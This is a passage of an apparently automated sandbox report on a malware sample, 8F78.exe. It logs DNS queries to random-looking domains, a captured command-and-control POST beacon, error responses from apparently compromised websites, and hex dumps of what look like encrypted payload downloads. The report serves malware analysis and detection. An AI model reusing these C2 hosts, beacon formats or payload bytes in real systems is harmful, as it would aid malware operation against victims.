                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sabrina_hunter@www.facebook.c< equals www.facebook.com (Facebook)
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                                Source: 8F78.exe, 00000007.00000002.3561545437.00000000009D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                                Source: unknownDNS traffic detected: queries for: onualituyrs.org
                                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://enporysqhiukeibs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: sumagulituyo.org
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:21 GMTServer: ApacheContent-Length: 131Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeStrict-Transport-Security: max-age=15724800; includeSubdomains
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeVary: Accept-Encoding
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:22 GMTServer: ApacheContent-Length: 131Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:22 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 600connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:22 GMTContent-Type: text/htmlContent-Length: 153Connection: closeVary: Accept-Encoding
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:22 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 600connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:22 GMTContent-Type: text/htmlContent-Length: 146Connection: closeStrict-Transport-Security: max-age=15724800; includeSubdomains
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:22 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 599connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINVary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 21 Dec 2023 04:03:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 21 Dec 2023 04:03:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nakacho.com/wp-json/>; rel="https://api.w.org/"
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nakacho.com/wp-json/>; rel="https://api.w.org/"
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Thu, 21 Dec 2023 04:03:22 GMTexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://eurokamen.sk/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-type: text/html; charset=UTF-8x-bver: v2connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Thu, 21 Dec 2023 04:03:21 GMTexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://eurokamen.sk/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-type: text/html; charset=UTF-8x-bver: v2connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S%2BBx3W15xiitFMNeO%2F794pxZ7UR3SS94mEPtXjq5peyj3l0CIasgIUj%2BsZv0Yz2iV8%2FwIKioUfWXQQhF4TXm282yGQWyR4uZwipj9%2FNe0gn1is4nMAKu00u2vamb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=15552000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 838d3c3f78098da9-MIAalt-svc: h3=":443"; ma=86400
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTServer: ApacheVary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTServer: ApacheVary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Mon, 23 Mar 2020 06:02:46 GMTETag: "415-5a17f6251cd80"Accept-Ranges: bytesContent-Length: 1045Connection: closeContent-Type: text/html
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTServer: ApacheVary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTContent-Type: text/htmlContent-Length: 570Connection: closeServer: IdeaWebServer/5.4.0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Thu, 21 Dec 2023 04:03:28 GMTcontent-length: 0content-type: text/htmlx-bver: v2connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 32598Connection: closeSet-Cookie: deviceType=desktop; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMTSet-Cookie: devicePixelRatio=1; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMTSet-Cookie: __fp_cjq=; Max-Age=0; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; SecureCache-Control: no-cache, must-revalidateETag: HcrOQGpy95KFCSJNzxot200biBMVary: Accept-EncodingX-Request-Id: e571c7009fb511eea98b15c3a9ec319cServer: None
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMT
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMT
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Mon, 23 Mar 2020 06:02:46 GMTETag: "415-5a17f6251cd80"Accept-Ranges: bytesContent-Length: 1045Connection: closeContent-Type: text/html
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Mon, 23 Mar 2020 06:02:46 GMTETag: "415-5a17f6251cd80"Accept-Ranges: bytesContent-Length: 1045Connection: closeContent-Type: text/html
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 32598Connection: closeSet-Cookie: deviceType=desktop; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMTSet-Cookie: devicePixelRatio=1; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMTSet-Cookie: __fp_cjq=; Max-Age=0; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; SecureCache-Control: no-cache, must-revalidateETag: HcrOQGpy95KFCSJNzxot200biBMVary: Accept-EncodingX-Request-Id: e592bc809fb511ee80766f155f979970Server: None
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundset-cookie: PHPSESSID=ljen1b9anoc766iiikaedbp8hc; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachecontent-type: text/html; charset=utf-8content-length: 147136date: Thu, 21 Dec 2023 04:03:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://escolapatelli.com.br/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://escolapatelli.com.br/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://magokorokan.com/wp-json/>; rel="https://api.w.org/"X-FRAME-OPTIONS: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundset-cookie: PHPSESSID=b67g2gqeru36u8lrmjb9ci567e; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachecontent-type: text/html; charset=utf-8content-length: 147136date: Thu, 21 Dec 2023 04:03:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Thu, 21 Dec 2023 04:03:29 GMTexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://eurokamen.sk/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-type: text/html; charset=UTF-8x-bver: v2connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://magokorokan.com/wp-json/>; rel="https://api.w.org/"X-FRAME-OPTIONS: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.2.10Strict-Transport-Security: max-age=15724800; includeSubdomains
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2VRX9WJjBPyltDtmR237UbxKbk%2BfjQtOIHqL9X1YRw49AIlcynEHAOXLcoK4QNrHdcMqHVYggVQWFzuQhuJWji%2FCQ4PLoVPfshizpahb0yn3lJi%2BlBPOEYtQ2oaN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=15552000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 838d3c53c8312245-MIAalt-svc: h3=":443"; ma=86400
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeStrict-Transport-Security: max-age=15724800; includeSubdomains
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.2.10Strict-Transport-Security: max-age=15724800; includeSubdomains
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Dec 2023 04:03:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nakacho.com/wp-json/>; rel="https://api.w.org/"
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:02:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 19 00 00 00 1f 3d 5a e5 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 8a ae 57 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:02:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 81 2c 1b 76 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 11 eb ff 78 83 11 db c4 0d 13 13 2a 20 e1 92 24 18 4f c5 03 d1 d7 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 5a 95 96 be 21 51 61 41 b8 20 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d cf 66 f8 0e 98 eb 7e 71 eb 40 ab 1a 30 e7 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 52 04 12 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 9b 47 d0 46 99 48 15 ac af eb d9 55 3d af ba 68 92 7e e3 9d f3 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b f3 38 c3 8e 82 11 e8 e4 1f 0a bd 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 b6 2e 85 1f d4 2c 74 91 9c 1d 06 f1 2c 06 b2 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 b0 bf c9 8b e1 d2 66 d7 9c 90 c3 e0 2b 25 a8 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c 91 5c f4 52 48 04 64 96 4d b5 e6 17 3f 78 f9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:02:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Dec 2023 04:02:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 15 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 07 1b 76 28 1e 84 60 41 b2 d4 9b 8d 6e 47 47 4e a0 ff 72 6e 80 79 aa 47 33 4b fe cd ea b7 41 8e 02 90 05 f9 ee 9f 25 f9 b1 16 31 81 cc b5 23 43 34 dc ce c3 a8 e6 4f 95 16 79 1c 61 5f 3e a9 fe 2d a2 22 1a 5c 76 3f e8 b7 69 27 e7 6e d5 6b 6d 75 85 03 0c 04 a2 2a f7 b1 b0 14 82 99 a1 79 e7 21 f9 e3 86 cf bf b9 bd 71 d7 21 7d 4f 87 21 ee fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 78 8d 55 db c4 0d 13 13 ef 5b e1 92 40 8e 48 c5 90 de 4b c4 61 7e de 